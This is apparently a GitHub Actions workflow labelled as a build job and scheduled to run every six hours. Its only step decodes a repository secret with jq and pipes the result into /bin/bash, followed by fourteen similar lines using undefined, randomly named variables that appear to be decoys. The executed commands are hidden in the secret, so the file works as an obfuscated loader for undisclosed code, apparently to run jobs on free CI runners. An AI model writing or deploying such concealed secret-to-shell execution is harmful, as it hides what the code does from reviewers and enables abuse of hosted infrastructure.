name: chenyatou0987
on:
  workflow_dispatch:
  schedule:
    - cron: '56 4/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: chenyatou0987
        env:
          oo14: ${{ secrets.oo14 }}
        run: |
          echo $oo14 | jq -r .k1 | /bin/bash
          echo $xlrdp19 | jq -r .h7987 | /bin/bash
          echo $hhx0078 | jq -r .o760 | /bin/bash
          echo $exbe233 | jq -r .afsr56217 | /bin/bash
          echo $gzarf875 | jq -r .rslrm37 | /bin/bash
          echo $ykxyy032 | jq -r .l17 | /bin/bash
          echo $bntj8 | jq -r .dmkir74480 | /bin/bash
          echo $tkrb5 | jq -r .ims36213 | /bin/bash
          echo $zo330 | jq -r .u56 | /bin/bash
          echo $ewt2771 | jq -r .pvb53 | /bin/bash
          echo $l208 | jq -r .owyhd829 | /bin/bash
          echo $uwfa6886 | jq -r .bu3578 | /bin/bash
          echo $oorln4178 | jq -r .qw824 | /bin/bash
          echo $glwo8 | jq -r .qqe3 | /bin/bash
          echo $u3824 | jq -r .rmfq3 | /bin/bash

